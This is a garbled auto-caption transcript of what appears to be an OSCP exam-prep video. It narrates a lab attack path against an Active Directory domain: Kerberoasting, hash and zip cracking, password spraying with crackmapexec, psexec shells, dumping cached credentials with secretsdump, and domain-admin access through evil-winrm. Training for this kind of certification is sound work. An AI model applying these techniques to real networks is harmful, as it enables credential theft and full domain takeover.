just make another one hashes [Music] asre so now we have hashes which is a as we can see here a ceros hash and then we've also got hashes do asre which is our metal beard user with a asre keros ticket ticket granting Service as rep so now what would we do we've got hashes if your answer is we would pass these hashes your answer is incorrect unfortunately because these are not ntlm has hashes they're not NT or LM hashes so these are not passable but they are crackable so let's see if we can crack let's go ahead and throw one of my favorites good old hashcat at start with the hashes rep and we're going to use a word list so user share word lists rock you again as far as the ocp exam is concerned and as far as my typical process while there's tons of word lists you should be able to use you should be able to crack any of the applicable words or applicable hashes on the exam with either a custom word list from a web page or some data that you've been Gathering or information about the domain or the workstation or more commonly if you don't have anything run rock you if you don't find it odds are it's not a crackable password so let's find out if this one is crackable we'll go and let this run shouldn't run for too long but you can always hit enter or hit a button and it'll tell you hey here's how long I have left and as you can see here it is recognizing the as rep hash it's running the rocku file as its base and it came back and sure enough we did not recover anything so we could also add on if you have the time although it's not always necessarily the right move but add on a rule set so we could say user share hashcat rules uh honestly I usually have good success with the best 64 if you don't find it with that again odds are it's not going to be crackable at least not within the ocp exam expectations of being crackable so we'll run that and in this case see as soon as you had that rule set on there it takes much longer because it's applying those variations and mutations to every word in the Rocky list so here we can see the guest mod is this rule list so just for the giggles I'll go and let this run for 10 minutes and let's see if it comes back with anything but if I was doing this during the exam I would continue to in this case enumerate further because if I run M two cracks one on this and one on the keros hash at the same time it's just going to cut down the time or it's going to extend the time to crack both because well we've only got so much CPU power and we are as you can see here pegged out we're using all of our resources so we'll come back when this finished is in about 10 minutes and sure enough we finished and it was not recovered which means this was probably a waste of time but you don't really know until you invest that so again always be multitasking in this case now that we verified we cannot crack the asre uh hash that belongs to metal beard how about the Kerberos so so let's go ahead and run hashcat again against hashes and use our Rocky word list see what happens here quick status check should only take about four oh and we got a hit hello the service accounts password is Portland 7 at wonderful now we've got some additional access and again these were credentials we got for free didn't cost us anything so let's save this so as rep roasting found metal beard but [Music] password not crackable Kerber roosting we found service I and password was crackable and it is Portland 7 at so we'll take that let's copy that we've now got some credentials to save so we go down here credentials now we've also got ocp SL SVC I the password is Portland so we've got two sets of creds so what's the first thing that we do when we get additional sets of credentials we enumerate with those credentials right everything has started all over so now let's add on here found asre and CER roastable users svci IIs password was crackable so now we're on to step nine which is further enumeration so let's go ahead we already saw the SMB Services were open we saw we had some shares let's go back let's retry that's our things to try now right now let's go back and let's enumerate SMB with new creds the service account let's go and clear this and let's continue so another tool tool that I like to use when I'm beginning my SMB enumeration is also to enumerate privileges so there's a fantastic tool for that called crack map exec or CME for short so crack map exec can help us with the SMB protocol uh to use it though what we're going to need to do is create just a couple of easy files so let's do Nano users actually let's do this at the Active Directory levels let's go back we know we have wild style and we know we now have SVC IIs for passwords we know we have wild styles password which was awesome 24 bang and now we just [Music] received the service IIs let's save that and now we can do crack map exec [Music] SMB and it'll beu for users passwords and who are we going to look at let's look at dco1 and I think I did that incorrectly and my order again helps to have right syntax so see have that or does not like that how about 10 102 200 okay so apparently just doesn't like host names that's the problem so in that case let's and again great thing about crack map exec is you just give it a destination and it will come back with a whole bunch of juicy info as well fingerprinting what we're looking at so Port 445 SMB 101 10101 1200 is host name dco1 here's our OS our host name and our domain name and looks like SMB signing is on SMB version one is not enabled so now let's go ahead and do our oh instead of this so now we know it's that and- you users DP passwords let's see what we get now oh and we forgot to say because they'll just stop on the first success continue on [Music] success okay so definitely doesn't show that we have any special privileges but we can log on so we may want to see if we get different levels of access same thing we can do this against 101102 202 which is mso2 what do we get okay same thing we can log on with SMB but that's still no special admin access so let's do that let's go ahead go back to our good old friend SMB well it's clear SMB client and let's in this case do dco1 and let's go do our backup share we saw again it was backups user is going to be ocp and instead of wild style this time we're going to try SVC IIs and our password was Portland oh what was it it's Portland 7 Ampersand hello we've we now have access we're not getting denied so there is an IT users. zip file in a backups share that this sounds fantastic I I want this please please let's check this out so in this case let's go and say I believe it's get it users. zip that should download it yes that downloads it let's exit let's move this file to dco1 files all right let's check this out let's seven zip extract [Music] oh you want a password okay so no password if I just hit enter error does not work okay let's try oh but of course quit yeah zero bytes so there's nothing there so let's try this again how about password how [Music] about admin how about password one two 3 okay well we could spend all day and all night trying these out or there might be a faster way to do this than manually let's leverage hashcat or better yet we can't actually cuz hashcat won't work with this there is a way to do this though and that's with John the Ripper however JN can't work with the zip file directly what it needs is that password hash right CU we don't crack zip files we just crack hashes so there is an actual tool for this called zip to John so if we say zip to John and give it the zip file it's going to spit out a hash let's actually save that to it users. I'm going to remove the it users. text file since that's empty don't need that confusing us so we have a hash file and we have our ZIP file so now we can take let's go and clear John the Ripper and we can throw it at the it users hash but we're going to need some pass password list and what's the password list that we default to or I default to uh for the ocp it is what we're going to have to say not rules uh it's going to be word list I believe d-word list and equals user share word lists and rock you see what we come and bingo immediately we get a hit that's fast John thank you you are fast T brick 14 okay let's try that so if we say szip extract it users. zip and we give it t. [Music] brick4 everything is okay we now extracted our file what do we have this looks good we have 109 bytes of text please please have some good have some juicy goodness in here let's see what we got yes we have credentials this is fantastic fantastic so we've got usernames and passwords we were just using a tool a second ago that might help us out with some usernames and password spraying let's go back to crack map exac so so crack map EXA can leverage this information very quickly to our advantage so let's go ahead and use crack map exec SMB 10112 200 and 10 well should be able to do comma 10 10 1202 see if that works first of all check that oh I don't think it like that how about [Music] Dash yep that works better okay so we're just going to use the dash and just ignore anything we get for 2011 since we already own that box and then we can say dasu it users. text and continue on success oh and we [Music] forgot it users. text oh that doesn't work look at that so instead it's actually grabbing the usernames and the passwords and passing them all at the same time so that's not going to work for us so in this case quick work around would be to say cat it users. text and let's do cut our delimiter is that we want the first field and spit that out to users. text in this case we'll just say users now do the second field spit that out that is passwords [Music] now we can go back to our crack map exit and [Music] say users passwords in this case I think was it domain uh we want to make sure and specify that as OS cp. [Music] laab oh hello anyone see that I saw that so as we go through and spray these you'll see Superman with superhero Superman it's basically going through anding every combination of the usernames and passwords seeing if there's any shared passwords across there and sure enough EMT works on dco1 which is great we can look to see if we have any additional shares or privileges that we might might have access to on those shares but more importantly pwned look at that so EMT with Rex rules has admin access to mso2 that is lateral movement now we're able to jump from ms01 well technically we're going to be running through MSO one and we now have potentially Ms admin access to mso2 that's instant admin access we don't even have to privilege escalate in this case so let's try that let's test that out what are we going to use hint it's not going to be SMB client different tool fantastic tool we're going to use the impa it version of PS exac cuz PS exac will take advantage of that SMB protocol and essentially run will give us a shell as EMT so let's check our commands make sure that we understand how we use it correctly because as we saw earlier syntax matters and Order matters so in this case we're going to go ahead and say we don't need to run a command we just want to go ahead and say PS exac ocp SL emit I believe it'll just be at or in this case we would just give it a yeah let's do the at 10 10 let's use the IP just to be specific here 202 password paste yes here we did we requested a share got access to the admin share uploaded our payload opened it with using a service creating a service oh sorry we use service manager to create a service start it and boom got ourselves a reverse shell and who am I system on mso2 oh that is so so wonderful that is instant admin access immediate privilege escalation what's the next thing that we want to do since we have privilege escalation on an additional machine we want to search for the loot right let's search for the loot so let's go ahead and go to back slash traditionally and on the exam I expect everything to be under users but again on your control panel it should tell you where to search or more specifically what's going to be important and I see a Lord Business Lord Business what are you doing on this machine huh I mean that makes it pretty quick and easy what if we just go to Lord [Music] Business and what are the odds it should be potentially on the desktop sure enough there it is there's our loot type proof. text bam that is money let's copy that and let's save that so exit mso2 Direct loot already there Nano proof. text paste clipboard oh and we forgot the big most important thing especially for the exam right is going to be jump in there as EMT and let's go ahead and oh we need to go back and grab that password because I do not remember what that was off the top of my head cat oh that was dco1 files it users text that password users Lord Business desktop so for the exam right we type show me the money give me that that data do who am I ip config and I always like to do host name as well there we go take a screenshot of that boom that is your evidence for your submissions that you need that's what you build in your report from there we can exit back out we've got our loot so now that we've got that let's go ahead and update our documentation to say we found an it- users. zip file on backup sh backups share from dco1 then what did we do we cracked the password for it users. zip with crack map exac at that point we found it users do text with credentials within the zip [Music] file sprayed at that point what did we do we sprayed new credentials against mso2 and dco1 and found EMT ocp EMT has local admin privileges on mso2 at that point we're at the next step so we've kind of been flying along here this this is what we've been doing with our things to try we've added a few options on here we now have another set of credentials ocp Emit and that password with Rex rules so at this point we know we have local access onto mso2 we can go ahead and run well actually we already noticed there was another user logged on Lord Business right right we've got credentials let's go ahead and go back and log back on let's do some quick manual enumeration we can have an a shell here essentially as Emit and local admin but domain user credentials and now we have interest in this Lord Business right who's Lord Business what can we find in there we might have some juiciness let's see text actually this would be Lord Business star. text oh you're kidding me no you're not kidding me cuz that makes sense we're on Windows not Linux what are you thinking get your syntax right so we found our proof the rest of this is a lot of fluff in the app data local packages so there's nothing else I'm seeing it's going to be helpful we can't really clear this but what might be helpful is checking out what that user is now since we have credentials we can do our typical local actually we could say net user see how many what users we have so there's no other local users on this this machine we can Al now do net user doain and we can look at all the domain users and sure enough there is a domain user for Lord Business tell me more about Lord Business net user Lord Business SL doain what what do you see this do you see what I'm seeing Lord Business group memberships domain admin ads that is a domain admin account this is domain Ownage if we can get access to this so this is very very interesting I would love to know more and more importantly I would love I so at this point we know that Lord Business is logged in what are the odds Lord business's credentials are cashed on this machine do you think we can grab grab that it's this is an example where we could use mimicat but there's another tool that allows us to do this remotely from our Cali box a new let's use impac it because impa it is so awesome that tool set is fantastic secret stump so secret stump can do a number of different things but it's all about giving us credentials it's almost like a remote version of mimic hats right so if we do Secrets dump and we point it at our destination in this case mso2 well what we want to do is let's try Secrets dump and in this case we know our ocp emit at 10101 1202 should have local admin privileges cuz just like PS exec it needs admin privileges uh at least local admin privileges here we go fingers crossed what are we going to get so oh yeah money that's what we're getting and absolutely sure enough so not only do we have dumped cached domain credentials of Lord Business but even better than that default password this is actually set for potentially like Auto logon which we saw in that setup file or setup directory which would make sense as to here sure enough tacos Tuesday Lord Business we now have plain text credentials for Lord Business if we didn't then we could also run or play past the hash with essentially the NT hash for Lord Business but we don't even need it in this case because we have the plain text password so let's give that a shot what do you think let's update our documentation used secret stump to extract cashed creds from mso2 and found Lord Business this hash and password we also used net user command to enumerate that Lord Business is a member of domain admins fantastic so you might be thinking exactly what I'm thinking which is the next step to Let's attempt to use Lord Business and PS exec perhaps actually better than that domain controllers have when RM enabled so there's another tool that gives us native abilities and some additional abilities on on top of PS exec that is evil wi RM to obtain domain admin shell on dco1 let's see let's see if this works and we can use evil when RM two ways we can use it with the hash and we can also use it with the password so let's go ahead and try just for fun with the hash in this case it would be evil win RM let's double check so the user ocp SL Lord Business and our Target is going to be actually so in this case I take that back it's going to be Dash I is just seeing that right there dasi for the IP so we can just say dco1 well let's go and use the IP 10 10200 the user it's going to be Lord Business we can skip the ocp it's actually implied since we're hitting a domain controller and let's try the hash so Capital H for the hash and let's paste that that's a password we'll try that next out paste selection let's see if that works I like to do pass the hash also just because we know that the hash should be good uh so establishing connection remote endpoint oh and authorization Deni so maybe that is not an nty might have to use mimic hats or another tool to get the Nash I'm going to guess that that's not it thankfully we don't have to go through any password cracking again we can just go right back to our plain text password so instead of DH we'll just do- [Music] P oh yeah that's it we're in and sure enough if we go to our desktop I'm going to guess oh you're not going to show me anything really nothing on there huh okay how about there we go administrator I bet you let's just look how about tree actually slf SLA administrator boom there it is desktop proof absolutely type actually you know let's go into it administrator desktop and let's get our screenshot right what do we want we want proof. text we want who am I we want IP config and what what do I also like to do just for Giggles host name bam screenshot that in this case we can also say download I believe with we evil winrm we've got some other cool options like we can upload and download files that isn't uh I don't believe supported with PS exact so we can say download proof. text sure enough got [Music] it and we need to move that that should not belong there proof. text let's go to dco1 loot and let's cat that sure enough there we go we have just obtained complete domain admin privileges we were able to obtain the loot from all of our active directory set this was step by step how to move through one example attack path so at this point we didn't attempt did we used Lord Business and we evil win RM to obtain domain admin shell on dco1 and we got our proof. text so at this point we would want to go back I would double check everything verify everything I would take screenshots again and basically start writing my report uh with what I had known assuming that I didn't have three more boxes to do which on the exam you will of your independent machines that also need to be hacked so the active directory set that we just went through only represents three of the boxes out of the six that you you need to work on and attack if you want to get 100% on the exam so we again moved into ms1 exploiting uh some code uh well some remote arbitration that's unfortunately unauthenticated using that software running on msl1 and we that at that point were able to use the service to get the unquoted service path to get privilege escalation on msl1 and then at that point we were able to gather our or will we found wild styles credentials saved in the Powershell history and then used that to enumerate we found SMB shares on dco1 from there we had to use some curb roasting to actually get some free credentials and use those creds that actually did have access to that share on dcl1 found the zip file had to crack the password on the zip file and within the zip file was our um text file with some more credentials but then we had to enumerate those credentials and found that one of them EMT had admin access on mso2 and then with that we were able to enumerate that there was a domain admin logged on to mso2 so we dumped the credentials and within the dumped credentials of mso2 we found Lord Business and Lord Business was our domain admin that gave us access directly into the domain controller and add immediate admin and full domain Ownage hopefully you all followed and enjoyed that if nothing else this is going to be great documentation and a reminder for one of the attack paths that I like to practice and I suppose if there's enough demand we may throw some other ones out there uh some additional ones that I practiced and that I thought were worthwhile to essentially practice all of the variety of ways of attacking active directory for the ocp

Info

Channel: Derron C

Views: 26,952

Rating: undefined out of 5

Keywords:

Id: gY_9Dncjw-s

Channel Id: undefined

Length: 117min 1sec (7021 seconds)

Published: Fri Oct 20 2023